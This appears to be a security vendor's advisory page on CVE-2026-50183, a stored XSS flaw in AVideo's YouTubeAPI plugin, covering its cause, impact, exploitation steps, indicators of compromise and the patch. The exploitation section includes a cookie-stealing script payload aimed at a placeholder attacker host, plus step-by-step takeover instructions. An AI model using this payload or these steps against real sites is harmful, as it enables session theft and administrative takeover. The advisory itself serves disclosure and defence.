CVE-2026-50183
PHP Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-50183 is a stored Cross-Site Scripting (XSS) vulnerability in the AVideo YouTubeAPI plugin (WWBN/AVideo) that allows any YouTube video uploader to inject malicious JavaScript into the AVideo homepage gallery by setting a hostile video title. The vulnerability affects AVideo versions ≤ 29.0 and was published on May 28, 2026, with the GitHub Advisory Database entry updated on June 4, 2026. It carries a CVSS v3.1 base score of 4.7 (Moderate) (GitHub Advisory).

Détails techniques

The root cause is CWE-79 (Stored XSS) chained with CWE-829 (Inclusion of Functionality from Untrusted Control Sphere): plugin/YouTubeAPI/YouTubeAPI.php::listVideos() fetches the snippet.title field from the YouTube Data API and stores it in a YPTvideoObject without sanitization, treating uploader-controlled content as trusted. plugin/YouTubeAPI/gallerySection.php then reflects the title into four HTML contexts in each gallery card — three with no encoding whatsoever, and one with only a partial str_replace('"', '', $youtubeTitle) mitigation that strips double quotes from a single attribute but leaves the other three sinks unprotected. The most dangerous sink (line 60) renders the title directly into the DOM as a live <script> element, causing synchronous JavaScript execution. AVideo's response caching (default cacheTimeout of 3600 seconds) means the malicious payload persists even after the hostile video title is changed or removed on YouTube (GitHub Advisory, AVideo Security Advisory).

Impact

Every visitor who loads any AVideo page rendering the YouTubeAPI gallery section is affected: the injected JavaScript executes in the visitor's browser session under the AVideo origin, enabling theft of non-HttpOnly cookies and issuance of authenticated requests on behalf of the victim. When the victim is an AVideo administrator, the payload can perform any admin action available via cookie-based authentication — including creating users, escalating privileges, modifying configuration, or installing plugins — effectively enabling full administrative takeover of the AVideo instance. The payload's persistence through the cache window (up to one hour by default) means it continues to affect users even after the malicious YouTube video is removed (GitHub Advisory).

Étapes d’exploitation

  1. Reconnaissance: Identify AVideo instances with the YouTubeAPI plugin enabled and showGallerySection=true (both are defaults after a YouTube Data API key is configured). Enumerate the operator's configured keyword/search query by observing the gallery content on the AVideo homepage.
  2. Create hostile YouTube video: Using any free YouTube account, upload a video and set its title to a JavaScript payload, e.g., <script>document.location='https://attacker.example/steal?c='+document.cookie</script>.
  3. Arrange query match: Ensure the hostile video appears in the AVideo operator's configured YouTube search results by including the operator's keyword phrase in the video's title, description, or by targeting a channel the operator follows.
  4. Wait for cache expiry: Wait up to 3600 seconds (default cacheTimeout) for AVideo's cached YouTube response to expire and a fresh listVideos() call to fetch the malicious title.
  5. Payload delivery: When any visitor (or administrator) loads the AVideo homepage or any page rendering the gallery section, the unencoded title is injected into the DOM as a live <script> element and executes synchronously in the victim's browser.
  6. Achieve objective: Collect stolen session cookies for account takeover, or — if the victim is an admin — issue authenticated admin API requests to create a backdoor account or install a malicious plugin (AVideo Security Advisory).

Indicateurs de compromis

  • Network: Outbound requests from visitor browsers to unexpected external domains (e.g., attacker-controlled cookie-harvesting endpoints) originating from AVideo gallery page loads; unusual JavaScript-initiated POST requests to AVideo admin endpoints from non-admin user sessions.
  • Logs: AVideo web server access logs showing repeated requests to the homepage or gallery-rendering pages from diverse IPs shortly after a new YouTube video matching the configured query was indexed; YouTube Data API cache refresh events (listVideos() calls) coinciding with introduction of a new video with anomalous title characters (<, >, script).
  • File System: Unexpected new admin accounts or configuration changes in the AVideo database following gallery page loads; modified plugin files if an attacker leveraged admin takeover to install a malicious plugin.
  • Process/Application: AVideo cache files (stored for cacheTimeout seconds) containing raw HTML/JavaScript in the snippet.title field of cached YouTube API responses (AVideo Security Advisory).

Atténuation et solutions de contournement

The fix was committed to the WWBN/AVideo repository (commit 7292129) and applies htmlspecialchars($video->title, ENT_QUOTES | ENT_HTML5, 'UTF-8') and equivalent encoding to the thumbnail URL before rendering in gallerySection.php, neutralizing all four injection sinks. As of the advisory publication, no patched release version was formally tagged (affected versions listed as ≤ 29.0 with "Patched versions: None" in the advisory), so operators should update to the latest master branch commit or apply the patch manually. As an interim workaround, disable the YouTubeAPI plugin or set showGallerySection=false in the plugin configuration, and manually flush the AVideo YouTube response cache to remove any already-cached malicious titles (AVideo Patch Commit, GitHub Advisory).

Réactions de la communauté

The vulnerability was reported by security researcher arkmarta and published by AVideo maintainer DanielnetoDotCom via GitHub's coordinated disclosure process on May 28, 2026. No significant broader media coverage or notable social media commentary beyond the GitHub advisory and GitLab advisory mirror has been identified (GitHub Advisory).

Ressources additionnelles


SourceCe rapport a été généré à l’aide de l’IA

Apparenté PHP Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-54458CRITICAL9.6
  • PHP logoPHP
  • wwbn/avideo
NonNonJul 15, 2026
CVE-2026-49279HIGH7.7
  • PHP logoPHP
  • wwbn/avideo
NonNonJul 15, 2026
GHSA-xg43-5579-qw6vMEDIUM6.5
  • PHP logoPHP
  • adawolfa/isdoc
NonOuiJul 15, 2026
CVE-2026-50182MEDIUM6.1
  • PHP logoPHP
  • wwbn/avideo
NonNonJul 15, 2026
CVE-2026-50183MEDIUM4.7
  • PHP logoPHP
  • wwbn/avideo
NonNonJul 15, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités